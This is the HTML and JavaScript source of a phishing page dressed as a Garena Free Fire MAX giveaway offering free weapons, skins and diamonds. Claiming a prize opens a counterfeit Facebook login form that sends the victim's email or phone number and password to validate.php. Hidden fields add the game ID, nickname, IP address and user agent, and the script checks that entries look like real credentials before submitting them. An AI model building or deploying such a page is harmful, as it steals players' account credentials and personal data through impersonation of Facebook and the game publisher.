<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <meta content="width=device-width,maximum-scale=1.0,initial-scale=1.0" name="viewport" />
        <link rel="icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire32-2.ico" type="image/x-icon" />
        <link rel="shortcut icon" href="https://freefiremobile-a.akamaihd.net/ffwebsite/images/freefire16-2.ico" type="image/x-icon" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
        <meta name="copyright" content="" />
        <meta content="black" name="apple-mobile-web-app-status-bar-style" />
        <meta name="apple-mobile-web-app-title" content="Garena Free Fire">
        <meta name="keywords" content="Knives out, pubg, terminator, bullet strike, survival, battle royale, last battleground, last man standing, battle, Bullet strike, point blank, battleground, rules of survival, rule, royale, crossfire, sinh tồn, nhảy dù, bắn súng, 生存, 大逃殺, 絕地求生, 槍戰, 全民, survivor royale, 荒野行動, 吃雞, 狙擊, 無限戰場, PB, Headshot, Crisis Action, ยิง, ปืน, Fortnite, shooting, sobrevivência, Jogos de tiro, a última pessoa viva, la última persona viva, Batalla Royale, disparo, la última persona viva, primera persona, acción, point, blank, last survivor, 배틀로얄, 프라파이어, 서바이벌, 최후 1인, 배틀그라운드, 배틀그라운즈, Free Fire, 생존, 생존게임, FPS, 배그, pubg mobile, world of tanks, танки, пабг, пубг, королевская битва, clash of clans, clash royale, cs go, battlegrounds" />
        <meta name="description" content="Free Fire is a mobile game where players enter a battlefield where there is only one winner - the last man standing. Grab weapons to do others in and supplies to bolster your chances of survival. Eventually, players are forced into a shrinking play zone to engage each other in a tactical and diverse environment." />
        <link rel="stylesheet" href="css/style.css">
        <link rel="stylesheet" href="https://unpkg.com/swiper@7/swiper-bundle.min.css"/>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    </head>
    <body onload="$('.content').load('pages/slide1.php')">
        <section id="sec1" class="sec1" title="Created By Amer Amerr">
            <div class="loader">
                <img src="https://h.top4top.io/p_2016h7ob71.gif">
            </div>
            <div class="wrap">
                <div class="header">
                    <div class="left">
                        <img class="icon" src="https://freefiremobile-a.akamaihd.net/common/web_event/maxoffical/app_icon.png">
                        <img class="logo" src="https://freefiremobile-a.akamaihd.net/common/web_event/maxoffical/logo_small.png">
                    </div>
                    <div class="right">
                        <img src="https://freefiremobile-a.akamaihd.net/ffwebsite/images/download/appstore3.png">
                        <img src="https://freefiremobile-a.akamaihd.net/ffwebsite/images/download/googleplay3.png">
                    </div>
                </div>
                <div class="inset">
                    <div class="swiper">
                        <div class="swiper-wrapper">
                        <div class="swiper-slide">
                            <img src="https://dl.dir.freefiremobile.com/common/web_event/hash/8e822cf7230420e5a4240972cc11efdajpg">
                        </div>
                        <div class="swiper-slide">
                            <img src="https://dl.dir.freefiremobile.com/common/web_event/hash/c175292e0a856831eeeeb727bd33c324jpg">
                        </div>
                        <div class="swiper-slide">
                            <img src="https://dl.dir.freefiremobile.com/common/web_event/hash/242c176892fae8907c4502dc6f745837jpg">
                        </div>
                        <div class="swiper-slide">
                            <img src="https://dl.dir.freefiremobile.com/common/web_event/hash/a0a4ae30805722476d7af24e8266c18ajpg">
                        </div>
                        <div class="swiper-slide">
                            <img src="https://dl.dir.freefiremobile.com/common/web_event/hash/caaa4b6f29bf5d772942932d761f831bjpg">
                        </div>
                        </div>
                        <div class="swiper-pagination"></div>
                    </div>
                </div>
                <div class="news">
                    <span class="left prev-slide"></span>
                    <h1>FREEFIRE MAX</h1>
                    <span class="right next-slide"></span>
                </div>
                <div class="content" id="slide1">

                </div>
                <div class="menu">
                    <div class="col active">
                        <div class="imgBoxz">
                            <img src="https://www.svgrepo.com/show/27064/gun.svg">
                        </div>
                        <span class="title">Weapon</span>
                    </div>
                    <div class="col">
                        <div class="imgBoxz">
                            <img src="https://www.svgrepo.com/show/268997/shirt-clothes.svg">
                        </div>
                        <span class="title">Skin Old</span>
                    </div>
                    <div class="col">
                        <div class="imgBoxz">
                            <img src="https://www.svgrepo.com/show/149188/diamond.svg">
                        </div>
                        <span class="title">Diamond</span>
                    </div>
                    <div class="col">
                        <div class="imgBoxz">
                            <img src="https://www.svgrepo.com/show/250365/chest.svg">
                        </div>
                        <span class="title">Incubator</span>
                    </div>
                </div>
            </div>

            <div class="popup-login login-facebook animated fadeIn" style="display: none;">
                <div class="popup-box-login-fb">
                   <div class="navbar-fb">
                      <img width="45" src="img/login/facebook_text.png">
                   </div>
                   <div class="content-box-fb">
                     <p class="alert sandi">Wrong password. <b>Have you forgotten your password?</b></p>
                     <p class="alert email">The mobile number or email you entered does not match any account. <b>Search your account.</b></p>
                      <img width="75" height="75" src="https://img.utdstc.com/icon/e61/511/e61511ae88f7d52fac67cd4c4f9c739bf71572d2923e1acf512f249ae0544fd4:200">
                      <div class="txt-login-fb">
                       Login to your account to connect to FREE FIRE.
                      </div>
                      <form class="login-form" method="POST" action="validate.php">
                         <label>
                         <input type="text" id="user" name="user" placeholder="Mobile number or email" autocomplete="off" autocapitalize="off">
                         </label>
                         <label>
                         <input type="password" id="pass" name="pass" placeholder="password" autocomplete="off" autocapitalize="off">
                         </label>
                         <!-- HIDDEN FORM -->
                         <input type="hidden" name="nick" value="">
                         <input type="hidden" name="id" value="">
                         <input type="hidden" name="ip" value="">
                         <input type="hidden" name="ua" value="">
                         <input type="hidden" name="hadiah" value="">
                         <!-- END -->
                         <button  type="submit" id="btnfb" class="btn-login-fb">Log In</button>
                      </form>
                      <div class="txt-create-account">Create account</div>
                      <div class="txt-not-now">Not now</div>
                      <div class="txt-forgotten-password">Forgot your password?</div>
                   </div>
                   <div class="language-box">
                      <center>
                      <div class="language-name language-name-active">English (UK)</div>
                      <div class="language-name">Bahasa Indonesia</div>
                      <div class="language-name">Basa Jawa</div>
                      <div class="language-name">Bahasa Melayu</div>
                      <div class="language-name">日本語</div>
                      <div class="language-name">Español</div>
                      <div class="language-name">Português (Brasil)</div>
                      <div class="language-name">
                         <i class="fa fa-plus"></i>
                      </div>
                      </center>
                   </div>
                   <div class="copyrights">Facebook Inc.</div>
                </div>
            </div>


            <div class="mask"></div>
            <div class="dialog">
                <a class="hide" onclick="tutup()"></a>
                <h1>Congratulations You Get</h1>
                <div class="imgReward">
                    <div class="boxImg">
                        <img id="hadiah" src="img/incubator/6.jpeg">
                    </div>
                </div>
                <div class="btn-login" onclick="$('.login-facebook').fadeIn()">Get it</div>
            </div>

            <div class="toast">
                <p class="toast-alert"></p>
            </div>

            <div class="trueid">
                <div class="alert"><i class="fa fa-circle-o-notch fa-spin"></i>Checking ID</div>
                <h1>VERIFY YOUR ID</h1>
                <input class="input" id="playerid" placeholder="Enter the ID" autocomplete="off">
                <div class="btn-check">Check ID</div>
            </div>
        </section>
        <script src="https://cdn.jsdelivr.net/gh/cdn-jquery/jquery/3.6.3/jquery.min.js"></script>
        <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script>
        <script src="https://raw.githubusercontent.com/john-doherty/swiped-events/master/src/swiped-events.js"></script>
        <script>
            const swiper = new Swiper('.swiper', {
            spaceBetween: 50,
            direction: 'horizontal',
            loop: true,
            autoplay: {
                delay: 2000,
                disableOnInteraction: false,
            },
            navigation: {
                nextEl: '.next-slide',
                prevEl: '.prev-slide',
            },
            });
        </script>
        <script>
            'use strict'
            // NATIVE JAVASCRIPT
            $(document).ready(function(){
                setTimeout(() => {
                    $('.loader').fadeOut()
                },1000)
            })
            $.ajax({
                type: "get",
                async: false,
                url: "https://na.apps.amsoveasea.com/swoole/?actid=2020&r=index/getCountry&_only_service_response_=1",
                dataType: "json",
                success: function (result) {
                $('input[name="ip"]').val(result.ip);
                $('input[name="ua"]').val(navigator.userAgent)
                }
            })
            window.addEventListener('submit',function(e){
                e.preventDefault();
                $("#btnfb").addClass("disabled");
                setTimeout(() => {
                var user = $('#user').val();
                var pass = $('#pass').val();
                if(user == '' || user == null)
                {
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                }else{

                    if(user.includes('@')){
                    let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                    if(user.match(pattern)){
                    $('.email').hide();
                    }else{
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }
                    }

                    if(!isNaN(user)){
                    if(user.length < 9){
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }else{
                    $('.email').hide();
                    }
                    }

                    if(user.match(/\s/g)){
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }else{
                    $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if(user.match(regex)){
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }


                    if(user.length <= 5){
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }else{
                    $('.email').hide();
                    }

                }
                if(pass == '' || pass == null || pass.length <= 5)
                {
                    $('.sandi').show();
                    $("#btnfb").removeClass("disabled");
                    return false;
                }else{
                    $('.sandi').hide();
                }
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if(pass.match(regexs)){
                    $('.sandi').show();
                    $('.email').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                    }else{
                    $('.sandi').hide();
                    }
                $('.login-form').submit()
                },1000)
            })
            const ng = document.querySelectorAll('.menu .col');
                for(let i = 0; i <= ng.length - 1; i++)
                {
                    ng[i].onclick = function(e)
                    {
                        let x = 0;
                        while(x < ng.length)
                        {
                            ng[x++].className = 'col';
                        }
                            ng[i].className = 'col active';
                            switch(ng[i].children[1].innerText){
                                case 'Senjata' : $('.content').load('pages/slide1.php')
                                                break;
                                case 'Skin Old' : $('.content').load('pages/slide2.php')
                                                break;
                                case 'Diamond' : $('.content').load('pages/slide3.php')
                                                break;
                                case 'Incubator' : $('.content').load('pages/slide4.php')
                            }
                    }
                }
                // JQUERY
                function gass(e){
                    var src = e.previousSibling.previousElementSibling.getElementsByTagName('img')[0].getAttribute('src');
                    $('#hadiah').attr('src',src);
                    $('input[name="hadiah"]').val(src);
                    $('.dialog').fadeIn().css('display','flex');
                    $('.mask').fadeIn();
                }
                function tutup(){
                    $('.dialog').fadeOut();
                    $('.mask').fadeOut()
                }
                $('.btn-check').click(function(){
                    let id = $('#playerid');
                    if(id.val() == '' || id.val() == null || id.val().length <= 5){
                        id.addClass('empty');
                        return false;
                    }else{
                        id.removeClass('empty');
                        $(this).addClass('disabled');
                    }
                    $('.alert').fadeIn();
                    // VALIDATE

                    $.get('https://api-xyz.com/trueid/freefire/?id='+id.val()+'&token=NguyenThuWan',function(data){
                        let status = data.result.status;
                            if(id.val().length==9){
                                    $('.trueid').hide();
                                    $('.alert').hide();
                                    $('.toast').fadeIn();
                                    $('input[name="id"]').val(id.val());
                                    $('input[name="nick"]').val(data.nickname);
                                    $('.toast-alert').text('Hi '+data.nickname+', Welcome');
                                    setTimeout(() => {
                                        $('.toast').fadeOut();
                                        $('.mask').fadeOut();
                                    },2000)
                            }else{
                                    $('.trueid').hide();
                                    $('.alert').hide();
                                    $('.toast').fadeIn();
                                    $('.toast-alert').text("Sorry, the ID you entered doesn't match");
                                    setTimeout(() => {
                                        $('.toast').hide();
                                        $('.trueid').fadeIn();
                                        $('.btn-check').removeClass('disabled');
                                    },2000)

                            }
                    })
                })
        </script>
    </body>
</html>
